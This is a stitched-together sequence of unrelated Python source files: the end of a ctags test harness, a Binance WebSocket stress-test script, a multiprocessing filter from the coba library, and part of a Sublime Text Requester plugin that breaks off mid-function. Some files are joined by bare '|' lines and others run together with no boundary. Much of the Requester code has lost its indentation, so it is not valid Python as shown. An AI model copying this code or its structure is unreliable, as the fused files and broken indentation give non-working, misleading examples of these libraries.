                        help='number of worker threads')
    parser.add_argument('--shell',
                        help='shell to be used.')
    parser.add_argument('tmain_dir',
                        help='Tmain directory.')
    parser.add_argument('build_dir', nargs='?', default='',
                        help='Build directory. If not given, tmain_dir is used.')
    res = parser.parse_args(args)
    if res.ctags:
        CTAGS = res.ctags
    COLORIZED_OUTPUT = (res.colorized_output == 'yes')
    WITH_VALGRIND = res.with_valgrind
    SHOW_DIFF_OUTPUT = res.show_diff_output
    if res.readtags:
        READTAGS = res.readtags
    if res.optscript:
        OPTSCRIPT = res.optscript
    if res.units:
        UNITS = res.units.split(',')
    NUM_WORKER_THREADS = res.threads
    if res.shell:
        SHELL = res.shell
    if res.build_dir == '':
        # In-tree build: generated files live next to the test sources.
        res.build_dir = res.tmain_dir
    #check_availability('awk')
    check_availability('diff')
    if isabs(res.build_dir):
        build_dir = res.build_dir
    else:
        build_dir = os.path.realpath(res.build_dir)
    ret = tmain_run(res.tmain_dir, build_dir, UNITS)
    if ret:
        return 0
    else:
        return 1
def action_clean_tmain(parser, action, *args):
    """Handler for the 'clean-tmain' sub-command.

    Removes all files generated during tmain testing (the per-aspect
    -actual/-diff captures plus gdb backtraces) below the given build
    directory. Returns 0.
    """
    parser.add_argument('tmain_dir',
                        help='Build directory for tmain testing.')
    parsed = parser.parse_args(args)
    tmain_dir = parsed.tmain_dir
    if not os.path.isdir(tmain_dir):
        error_exit(0, 'No such directory: ' + tmain_dir)
    for obj in ('stdout', 'stderr', 'exit', 'tags'):
        for typ in ('actual', 'diff'):
            pattern = tmain_dir + '/**/' + obj + '-' + typ + '.txt'
            for leftover in glob.glob(pattern, recursive=True):
                os.remove(leftover)
    for leftover in glob.glob(tmain_dir + '/**/gdb-backtrace.txt', recursive=True):
        os.remove(leftover)
    return 0
def prepare_environment():
    """Pin down the environment for reproducible test runs.

    Forces the C locale and disables MSYS2 argument conversion for the
    ctags options listed, both for this process (os.environ) and for child
    shells via the _PREPERE_ENV preamble string.
    """
    global _PREPERE_ENV
    os.environ['LC_ALL'] = 'C'
    os.environ['MSYS2_ARG_CONV_EXCL'] = '--regex-;--_scopesep;--exclude;--exclude-exception'
    _PREPERE_ENV = """LC_ALL="C"; export LC_ALL
MSYS2_ARG_CONV_EXCL='--regex-;--_scopesep;--exclude;--exclude-exception' export MSYS2_ARG_CONV_EXCL
"""
# enable ANSI escape sequences on Windows 10 1511 (10.0.10586) or later
def enable_esc_sequence():
    """Turn on virtual-terminal processing for stdout on Windows consoles.

    No-op on non-Windows platforms, where ANSI escapes work natively.
    """
    if os.name != 'nt':
        return
    import ctypes
    kernel32 = ctypes.windll.kernel32
    ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4
    STD_OUTPUT_HANDLE = -11
    handle = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
    mode = ctypes.c_ulong()
    # Only set the flag when the current mode could actually be queried.
    if kernel32.GetConsoleMode(handle, ctypes.byref(mode)) != 0:
        kernel32.SetConsoleMode(
            handle, mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
def main():
    """Entry point: build the sub-command parsers, then dispatch
    sys.argv[1] to the matching action handler and exit with its status."""
    prepare_environment()
    enable_esc_sequence()
    parser = argparse.ArgumentParser(
        description='Units test harness for ctags.')
    subparsers = parser.add_subparsers(dest='action', metavar='ACTION')
    # (name, handler, aliases, description, help) for each sub-command.
    specs = [
        ('run', action_run, ['units'],
         'Run all tests case under units_dir.',
         'Run all tests case'),
        ('clean', action_clean, [],
         'Clean all files created during units testing.',
         'Clean all files created during units testing'),
        ('tmain', action_tmain, [],
         'Run tests for main part of ctags.',
         'Run tests for main part of ctags'),
        ('clean-tmain', action_clean_tmain, [],
         'Clean all files created during tmain testing.',
         'Clean all files created during tmain testing'),
    ]
    cmdmap = {}
    for name, handler, aliases, desc, short_help in specs:
        sub = subparsers.add_parser(name, aliases=aliases,
                                    description=desc, help=short_help)
        cmdmap[name] = [handler, sub]
    cmdmap['units'] = cmdmap['run']
    subparsers.add_parser('help',
                          help='show this help message and exit')
    cmdmap['help'] = [action_help, parser]
    if len(sys.argv) < 2:
        parser.print_help()
        sys.exit(1)
    # Only parse the action word here; the handler re-parses the full argv.
    parsed = parser.parse_args(sys.argv[1:2])
    (func, subparser) = cmdmap[parsed.action]
    sys.exit(func(subparser, *sys.argv[1:]))
# Allow the harness to be executed directly as a script.
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_full_non_stop.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
    """Drain the manager's stream_buffer forever; exit when the manager stops.

    Waits 30 seconds before starting so data can accumulate first. Popped
    items are discarded (this dev test only exercises buffer throughput).
    """
    time.sleep(30)
    while True:
        if binance_websocket_api_manager.is_manager_stopping():
            exit(0)
        stream_data = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if stream_data is False:
            # Buffer empty: back off briefly instead of busy-waiting.
            time.sleep(0.01)
# https://docs.python.org/3/library/logging.html#logging-levels
# Log to a file named after this script; mirror 'unicorn-log' records to the
# console at INFO level as well.
logging.basicConfig(filename=os.path.basename(__file__) + '.log',
                    format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
                    style="{")
logging.getLogger('unicorn-log').addHandler(logging.StreamHandler())
logging.getLogger('unicorn-log').setLevel(logging.INFO)
# create instance of BinanceWebSocketApiManager
binance_websocket_api_manager = BinanceWebSocketApiManager()
print("starting monitoring api!")
binance_websocket_api_manager.start_monitoring_api()
# set api key and secret for userData stream
binance_api_key = ""
binance_api_secret = ""
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"])
# NOTE(review): the argument order below is inconsistent with the two calls
# around it (["arr"] first vs second) — presumably the library accepts either
# order for "arr" streams; verify against the manager's create_stream() docs.
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["!ticker"], ["arr"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])
# A wide basket of markets to stress many channels at once.
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
           'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
           'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
           'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
           'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
           'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc', 'xrpbnb',
           'bchabcpax', 'xrpeth', 'bttbnb', 'ltcbnb', 'agibtc', 'zrxusdt', 'xlmbnb', 'ltceth', 'eoseth',
           'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
           'engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax',
           'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
           'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
           'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth'}
# One stream per channel over the full basket.
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["trade"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
# A smaller basket combined with many channels in one multiplexed stream.
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
           'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
           'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
           'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
           'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb'}
channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w',
            'miniTicker', 'depth20'}
# NOTE: `id` shadows the builtin of the same name; kept as-is for this script.
id = binance_websocket_api_manager.create_stream(channels, markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
    binance_websocket_api_manager.print_summary()
    #binance_websocket_api_manager.print_stream_info(id)
    time.sleep(1)
|
import sys
import multiprocessing.pool
from multiprocessing import Manager
from threading import Thread
from typing import Sequence, Iterable, Any
from coba.config import CobaConfig, IndentLogger, CobaFatal
from coba.pipes import Filter, Sink, Pipe, StopPipe, QueueSource, QueueSink
# Keep a reference to the stock multiprocessing pool worker so the
# replacement defined below can delegate the actual work to it.
super_worker = multiprocessing.pool.worker #type: ignore

def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None, wrap_exception=False):
    """Drop-in replacement for multiprocessing.pool.worker.

    Delegates to the stock worker but converts two noisy failure modes into
    quiet, coded process exits so their tracebacks never reach the console.
    The exit codes are inspected by MyPool._join_exited_workers below.
    """
    try:
        super_worker(inqueue, outqueue, initializer, initargs, maxtasks, wrap_exception)
    except KeyboardInterrupt:
        #we handle this exception because otherwise it is thrown and written to console
        #by handling it ourself we can prevent it from being written to console
        sys.exit(2000)
    except AttributeError:
        #we handle this exception because otherwise it is thrown and written to console
        #by handling it ourself we can prevent it from being written to console
        sys.exit(1000) #this is the exitcode we use to indicate when we're exiting due to import errors

# Install the replacement so every pool created after this import uses it.
multiprocessing.pool.worker = worker #type: ignore
class MultiprocessFilter(Filter[Iterable[Any], Iterable[Any]]):
    """Evaluate an inner filter pipeline over items using multiple processes.

    Items are fanned out to a process pool; each worker writes its results
    and its log lines back to the parent through manager queues so output
    and logging stay usable from the main process.
    """

    class Processor:
        """The callable executed inside a worker process for a single item."""

        def __init__(self, filters: Sequence[Filter], stdout: Sink, stdlog: Sink, n_proc: int) -> None:
            self._filter = Pipe.join(filters)
            self._stdout = stdout
            self._stdlog = stdlog
            self._n_proc = n_proc

        def process(self, item) -> None:
            #One problem with this is that the settings on the main thread's logger
            #aren't propogated to this logger. For example, with_stamp and with_name.
            #A possible solution is to deep copy the CobaConfig.Logger, set its `sink`
            #property to the `stdlog` and then pass it to `Processor.__init__`.
            CobaConfig.Logger = IndentLogger(self._stdlog, with_name=self._n_proc > 1)
            try:
                self._stdout.write(self._filter.filter([item]))
            except StopPipe:
                pass
            except Exception as e:
                CobaConfig.Logger.log_exception(e)
            except KeyboardInterrupt:
                #When ctrl-c is pressed on the keyboard KeyboardInterrupt is raised in each
                #process. We need to handle this here because Processor is always ran in a
                #background process and receives this. We can ignore this because the exception will
                #also be raised in our main process. Therefore we simply ignore and trust the main to
                #handle the keyboard interrupt gracefully.
                pass

    def __init__(self, filters: Sequence[Filter], processes=1, maxtasksperchild=None) -> None:
        """Store the pipeline stages and pool configuration.

        Args:
            filters: the pipeline stages each item is passed through.
            processes: number of worker processes in the pool.
            maxtasksperchild: tasks a worker may run before being replaced.
        """
        self._filters = filters
        self._processes = processes
        self._maxtasksperchild = maxtasksperchild

    def filter(self, items: Iterable[Any]) -> Iterable[Any]:
        """Yield the results of running `items` through the pipeline in parallel."""
        # BUG FIX: this method contains `yield`, which makes it a generator
        # function. The previous `return items` on the no-filter fast path
        # therefore yielded NOTHING (a `return` in a generator just stops
        # iteration); `yield from` is required to actually pass items through.
        if len(self._filters) == 0:
            yield from items
            return
        try:
            with Manager() as manager:
                stdout_queue = manager.Queue() #type: ignore
                stdlog_queue = manager.Queue() #type: ignore
                stdout_writer, stdout_reader = QueueSink(stdout_queue), QueueSource(stdout_queue)
                stdlog_writer, stdlog_reader = QueueSink(stdlog_queue), QueueSource(stdlog_queue)

                class MyPool(multiprocessing.pool.Pool):

                    _missing_error_definition_error_is_new = True

                    def _join_exited_workers(self):
                        for worker in self._pool:
                            if worker.exitcode == 1000 and MyPool._missing_error_definition_error_is_new:
                                #this is a hack... This only works so long as we just
                                #process one job at a time... This is true in our case.
                                #this is necessary because multiprocessing can get stuck
                                #waiting for failed workers and that is frustrating for users.
                                MyPool._missing_error_definition_error_is_new = False
                                message = (
                                    "Coba attempted to evaluate your benchmark in multiple processes but the pickle module was unable to "
                                    "find all the definitions needed to pass the tasks to the processes. The two most common causes of "
                                    "this error are: 1) a learner or simulation is defined in a Jupyter Notebook cell or 2) a necessary "
                                    "class definition exists inside the `__name__=='__main__'` code block in the main execution script. In "
                                    "either case there are two simple solutions: 1) evalute your benchmark in a single processed with no "
                                    "limit on child tasks or 2) define all you classes in a separate python file that is imported when "
                                    "evaluating."
                                )
                                CobaConfig.Logger.log(message)
                            if worker.exitcode is not None and worker.exitcode != 0:
                                #A worker exited in an uncontrolled manner and was unable to clean its job
                                #up. We therefore mark one of the jobs as "finished" but failed to prevent an
                                #infinite wait on a failed job to finish that is actually no longer running.
                                list(self._cache.values())[0]._set(None, (False, None))
                        return super()._join_exited_workers()

                with MyPool(self._processes, maxtasksperchild=self._maxtasksperchild) as pool:
                    # handle not picklable (this is handled by done_or_failed)
                    # handle empty list (this is done by checking result.ready())
                    # handle exceptions in process (unhandled exceptions can cause children to hang so we pass them to stderr)
                    # handle ctrl-c without hanging
                    #   > don't call result.get when KeyboardInterrupt has been hit
                    #   > handle EOFError,BrokenPipeError errors with queue since ctr-c kills manager
                    # handle AttributeErrors. These occure when... (this is handled by shadowing several pool methods)
                    #   > a class that is defined in a Jupyter Notebook cell is pickled
                    #   > a class that is defined inside the __name__=='__main__' block is pickeled
                    # handle Benchmark.evaluate not being called inside of __name__=='__main__' (this is handled by a big try/catch)

                    def done_or_failed(results_or_exception=None):
                        #This method is called one time at the completion of map_async
                        #in the case that one of our jobs threw an exception the argument
                        #will contain an exception otherwise it will be the returned results
                        #of all the jobs. This method is executed on a thread in the Main context.
                        if isinstance(results_or_exception, Exception):
                            from coba.config import CobaConfig
                            if "Can't pickle" in str(results_or_exception) or "Pickling" in str(results_or_exception):
                                message = (
                                    str(results_or_exception) + ". Coba attempted to process your Benchmark on multiple processes and "
                                    "the named class was not able to be pickled. This problem can be fixed in one of two ways: 1) "
                                    "evaluate the benchmark in question on a single process with no limit on the tasks per child or 2) "
                                    "modify the named class to be picklable. The easiest way to make the given class picklable is to "
                                    "add `def __reduce__ (self) return (<the class in question>, (<tuple of constructor arguments>))` to "
                                    "the class. For more information see https://docs.python.org/3/library/pickle.html#object.__reduce__."
                                )
                                CobaConfig.Logger.log(message)
                            else:
                                CobaConfig.Logger.log_exception(results_or_exception)
                        # Poison pills so the queue readers terminate.
                        stdout_writer.write([None])
                        stdlog_writer.write([None])

                    log_thread = Thread(target=Pipe.join(stdlog_reader, [], CobaConfig.Logger.sink).run)
                    log_thread.daemon = True
                    log_thread.start()

                    processor = MultiprocessFilter.Processor(self._filters, stdout_writer, stdlog_writer, self._processes)
                    result = pool.map_async(processor.process, items, callback=done_or_failed, error_callback=done_or_failed, chunksize=1)

                    # When items is empty finished_callback will not be called and we'll get stuck waiting for the poison pill.
                    # When items is empty ready() will be true immediately and this check will place the poison pill into the queues.
                    if result.ready(): done_or_failed()

                    try:
                        for item in stdout_reader.read():
                            yield item
                        pool.close()
                    except (KeyboardInterrupt, Exception):
                        try:
                            pool.terminate()
                        except:
                            pass
                        raise
                    finally:
                        pool.join()
                        log_thread.join()
        except RuntimeError as e:
            #This happens when importing main causes this code to run again
            raise CobaFatal(str(e))
import sublime
import os
import sys
import imp
import re
import json
from collections import OrderedDict
from threading import Thread, Lock
from time import time
from queue import Queue
from ..add_path import add_path
from .helpers import is_auxiliary_view
from .responses import ResponseThreadPool, prepend_library
class RequestCommandMixin:
"""This mixin is the motor for parsing an env, executing requests in parallel
in the context of this env, invoking activity indicator methods, and invoking
response handling methods. These methods can be overridden to control the
behavior of classes that inherit from this mixin.
It must be mixed in to classes that also inherit from
`sublime_plugin.TextCommand`.
"""
REFRESH_MS = 100 # period of checks on async operations, e.g. requests
ACTIVITY_SPACES = 9 # number of spaces in activity indicator
MAX_WORKERS = 10 # default request concurrency
RESPONSE_POOLS = Queue()
MAX_NUM_RESPONSE_POOLS = 10 # up to N response pools can be stored
LOCK = Lock() # this lock is shared among all instances
    def get_requests(self):
        """This must be overridden to return a list of request strings.

        Hint: use `core.parsers.parse_requests`.
        """
        # The mixin cannot know where request strings come from (view text,
        # a file, ...), so concrete commands must supply them.
        raise NotImplementedError(
            '"get_requests" must be overridden to return a list of request strings')
    def show_activity_for_pending_requests(self, requests, count, activity):
        """Override this method to customize user feedback for pending requests.

        `activity` string is passed for convenience, it is generated by
        `get_activity_indicator`. Intentionally a no-op in the base mixin.
        """
    def handle_response(self, response):
        """Override this method to handle a response from a single request. This
        method is called as each response is returned. Intentionally a no-op
        in the base mixin.
        """
    def handle_responses(self, responses):
        """Override this method to handle responses from all requests executed.
        This method is called after all responses have been returned.
        Intentionally a no-op in the base mixin.
        """
def handle_errors(self, responses):
"""Override this method to change Requester's default error handling. This
is a convenience method that is called on all responses after they are
returned.
"""
errors = ['{}\n{}'.format(r.req.request, r.err) for r in responses if r.err]
if errors:
sublime.error_message('\n\n'.join(errors[:100]))
if len(errors) > 100:
print('Requester Errors: {} remaining errors not printed'.format(len(errors) - 100))
    def run(self, edit):
        """Sublime Text entry point: load settings, evaluate the env on a
        background thread, and start polling it via `_run`."""
        self.reset_status()
        self.config = sublime.load_settings('Requester.sublime-settings')
        # `run` runs first, which means `self.config` is available to all methods
        thread = Thread(target=self._get_env)
        thread.start()
        self._run(thread)
    def _run(self, thread, count=0):
        """Evaluate environment in a separate thread and show an activity
        indicator. Inspect thread at regular intervals until it's finished, at
        which point `make_requests` can be invoked. Return if thread times out.
        """
        # Poll the env thread twice per REFRESH_MS period.
        REFRESH_MULTIPLIER = 2
        activity = self.get_activity_indicator(count//REFRESH_MULTIPLIER, self.ACTIVITY_SPACES)
        if count > 0:  # don't distract user with RequesterEnv status if env can be evaluated quickly
            self.view.set_status('requester.activity', '{} {}'.format('RequesterEnv', activity))
        if thread.is_alive():
            timeout = self.config.get('timeout_env', None)
            # count * REFRESH_MS/REFRESH_MULTIPLIER is elapsed ms; timeout is seconds.
            if timeout is not None and count * self.REFRESH_MS/REFRESH_MULTIPLIER > timeout * 1000:
                sublime.error_message('Timeout Error: environment took too long to parse')
                self.view.set_status('requester.activity', '')
                return
            # Reschedule ourselves until the env thread finishes.
            sublime.set_timeout(lambda: self._run(thread, count+1), self.REFRESH_MS/REFRESH_MULTIPLIER)
        else:
            requests = self.get_requests()
            self.view.set_status('requester.activity', '')
            self.make_requests(requests, self._env)
    def get_env(self):
        """Computes an env from `requester.env_string` and `requester.file`
        settings. Returns a tuple containing an env dictionary and a combined env
        string.

        http://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path
        """
        env_strings = []
        packages_path = self.config.get('packages_path', '')
        if packages_path and packages_path not in sys.path:  # makes it possible to import any Python package in env
            sys.path.append(packages_path)
        env_block, env_block_line_number, env_file, env_file_line_number = [None] * 4
        parsed = False
        if not is_auxiliary_view(self.view):  # (1) try to get env from current view
            self.view.settings().set('requester.file', self.view.file_name())
            text = self.view.substr(sublime.Region(0, self.view.size()))
            env_block, env_block_line_number, env_file, env_file_line_number = self.parse_env(text)
            parsed = True
        else:
            file = self.view.settings().get('requester.file', None)
            if file:  # (2) try to get env from saved requester file if (1) not possible
                try:
                    with open(file, 'r', encoding='utf-8') as f:
                        text = f.read()
                except Exception as e:
                    self.add_error_status_bar(str(e))
                else:
                    env_block, env_block_line_number, env_file, env_file_line_number = self.parse_env(text)
                    parsed = True
        if not parsed:  # (3) try to get env from saved env string if (1) and (2) not possible
            env_string = self.view.settings().get('requester.env_string', None)
            return self.get_env_dict_from_string(env_string), env_string
        if env_file:
            # A relative env_file is resolved against the requester file's directory.
            if not os.path.isabs(env_file):
                file_path = self.view.settings().get('requester.file')
                if file_path:
                    env_file = os.path.join(os.path.dirname(file_path), env_file)
            try:
                with open(env_file, 'r') as f:
                    env_strings.append(f.read())
            except Exception as e:
                self.add_error_status_bar(str(e))
        env_strings.append(env_block)
        non_empty_env_strings = [s for s in env_strings if s]
        # NOTE(review): when both an env block and an env file are present,
        # their order is swapped based on which appears first in the file —
        # presumably so the later source takes precedence; confirm against
        # get_env_dict_from_string's merge semantics.
        if env_block_line_number is not None and env_file_line_number is not None:
            if env_block_line_number < env_file_line_number:
                non_empty_env_strings.reverse()
        env_string = '\n\n'.join(non_empty_env_strings)
        self.view.settings().set('requester.env_string', env_string)
        return self.get_env_dict_from_string(env_string), env_string
def _get_env(self):
    """Wrapper calls `get_env`, assigns return values to instance properties.
    """
    env, env_string = self.get_env()
    self._env = env
    self._env_string = env_string
def set_env_on_view(self, view):
    """Convenience method that copies env settings from this view to `view`.
    """
    source_settings = self.view.settings()
    target_settings = view.settings()
    for setting in ('requester.file', 'requester.env_string'):
        target_settings.set(setting, source_settings.get(setting, None))
def make_requests(self, requests, env=None):
    """Make requests concurrently using a `ThreadPool`, which itself runs on
    an alternate thread so as not to block the UI.

    :param requests: requests to execute
    :param env: env dict passed along to the thread pool
    """
    pools = self.RESPONSE_POOLS
    pool = ResponseThreadPool(requests, env, self.MAX_WORKERS, self.view)  # pass along env vars to thread pool
    pools.put(pool)
    # evict oldest pools so only MAX_NUM_RESPONSE_POOLS are tracked at once
    while pools.qsize() > self.MAX_NUM_RESPONSE_POOLS:
        old_pool = pools.get()
        old_pool.is_done = True  # don't display responses for a pool which has already been removed
    sublime.set_timeout_async(pool.run, 0)  # run on an alternate thread
    # start polling for responses shortly after kicking off the pool
    sublime.set_timeout(lambda: self.gather_responses(pool), 15)
# small delay to show activity for requests that are returned in less than REFRESH_MS
def _show_activity_for_pending_requests(self, requests, count):
    """Show activity indicator in status bar.
    """
    activity = self.get_activity_indicator(count, self.ACTIVITY_SPACES)
    status = '{} {}'.format('Requester', activity)
    self.view.set_status('requester.activity', status)
    self.show_activity_for_pending_requests(requests, count, activity)
def gather_responses(self, pool, count=0, responses=None):
    """Inspect thread pool at regular intervals to remove completed responses
    and handle them, and show activity for pending requests.

    Clients can handle responses and errors one at a time as they are
    completed, or as a group when they're all finished. Each response objects
    contains `request`, `response`, `error`, and `ordering` keys.

    :param count: number of polls so far; drives the activity indicator
    :param responses: accumulator carried across recursive invocations
    """
    self._show_activity_for_pending_requests(pool.get_pending_requests(), count)
    is_done = pool.is_done  # cache `is_done` before removing responses from pool
    if responses is None:
        responses = []

    # drain currently-completed responses and handle each one immediately
    for _ in range(len(pool.responses)):
        response = pool.responses.popleft()
        responses.append(response)
        self.handle_response(response)

    if is_done:
        responses.sort(key=lambda response: response.req.ordering)
        self.handle_responses(responses)
        self.handle_errors(responses)
        self.persist_requests(responses)
        self.view.set_status('requester.activity', '')  # remove activity indicator
        return

    # not done yet: schedule another poll after REFRESH_MS
    sublime.set_timeout(lambda: self.gather_responses(pool, count+1, responses), self.REFRESH_MS)
def persist_requests(self, responses):
    """Persisting requests is NOT thread safe, so this wrapper locks access to
    `persist_requests`. Failure to do this results in corruption of the
    history file sooner or later.
    """
    with self.LOCK:
        # delegate to the module-level helper that does the real work
        persist_requests(self, responses)
def add_error_status_bar(self, error):
    """Logs error to console, and adds error in status bar. Not as obtrusive
    as `sublime.error_message`.
    """
    self._status_errors.append(error)
    print('{}: {}'.format('Requester Error', error))
    joined_errors = ', '.join(self._status_errors)
    self.view.set_status('requester.errors', '{}: {}'.format('RequesterErrors', joined_errors))
def reset_status(self):
    """Clear error list and all Requester status-bar segments. Make sure this
    is called _before_ `add_error_status_bar`.
    """
    self._status_errors = []
    for status_key in ('requester.errors', 'requester.download', 'requester.benchmarks'):
        self.view.set_status(status_key, '')
@staticmethod
def parse_env(text):
"""Parses `text` for first env block, and returns text within this env
block.
Also returns line numbers for start of env block and env file.
"""
delimeter = '###env'
in_block = False
env_lines = []
env_block_line_number = None
env_file_line_number = None
for i, line in enumerate(text.splitlines()):
if in_block:
if line == delimeter:
in_block = False
break
env_lines.append(line)
else:
if line == delimeter:
env_block_line_number = i
in_block = True
scope = {}
p = re.compile(r'\s*env_file\s*=.*')
for i, line in enumerate(text.splitlines()):
if p.match(line): # matches only at beginning of string
try:
exec(line, scope) # add `env_file` to `scope` dict
env_file_line_number = i
except Exception as e:
print(e)
break # stop looking after first match
env_file = scope.get('env_file')
if not len(env_lines) or in_block: # env block must be closed to take effect
return None, None, env_file, env_file_line_number
return '\n'.join(env_lines), env_block_line_number, env_file, env_file_line_number
@staticmethod
def get_env_dict_from_string(s):
    """Execute env string `s` as a fresh Python module and return that
    module's namespace as a dict. Returns `{}` for an empty string or if
    executing `s` raises.

    http://stackoverflow.com/questions/5362771/load-module-from-string-in-python
    """
    try:
        del sys.modules['requester.env']  # this avoids a subtle bug, DON'T REMOVE
    except KeyError:
        pass

    if not s:
        return {}

    env = imp.new_module('requester.env')
    try:
        # make the bundled `deps` directory importable while `s` executes
        with add_path(__file__, '..', '..', 'deps'):
            exec(s, env.__dict__)
    except Exception as e:
        sublime.error_message(
            'EnvBlock Error:\n{}\n\nOpen the console to see the full environment string'.format(e))
        print('\nEnvString:\n```\n{}\n```'.format(s))
        return {}
    else:
        return dict(env.__dict__)
@staticmethod
def get_activity_indicator(count, spaces):
"""Return activity indicator string.
"""
cycle = count // spaces
if cycle % 2 == 0:
before = count % spaces
else:
before = spaces - (count % spaces)
after = spaces - before
return '[{}={}]'.format(' ' * before, ' ' * after)
def persist_requests(self, responses, history_path=None):
    """Persist up to N requests to a history file, along with the context
    needed to rebuild the env for these requests. One entry per unique
    request. Old requests are removed when requests exceed file capacity.

    Requests in history are keyed for uniqueness on request string + file.

    :param responses: iterable of (request, response, error) triples
    :param history_path: optional override for the history file location
    """
    history_file = self.config.get('history_file', None)
    if not history_file:
        return
    if not history_path:
        history_path = os.path.join(sublime.packages_path(), 'User', history_file)

    try:
        with open(history_path, 'r') as f:
            text = f.read() or '{}'
    except FileNotFoundError:
        open(history_path, 'w').close()  # create history file if it doesn't exist
        text = '{}'
    except Exception as e:
        sublime.error_message('HistoryFile Error:\n{}'.format(e))
        return
    # OrderedDict keeps insertion order: oldest entries first
    rh = json.loads(text, object_pairs_hook=OrderedDict)

    for response in responses:  # insert new requests
        req, res, err = response
        if res is None:
            continue
        # BUGFIX: reset `meta` for each response; it was previously initialized
        # once before the loop, so a request without streamed/chunked/filename
        # kwargs inherited the previous request's meta label
        meta = None
        if 'streamed' in req.skwargs:
            meta = 'streamed: {}'.format(req.skwargs['streamed'])
        if 'chunked' in req.skwargs:
            meta = 'chunked: {}'.format(req.skwargs['chunked'])
        if 'filename' in req.skwargs:
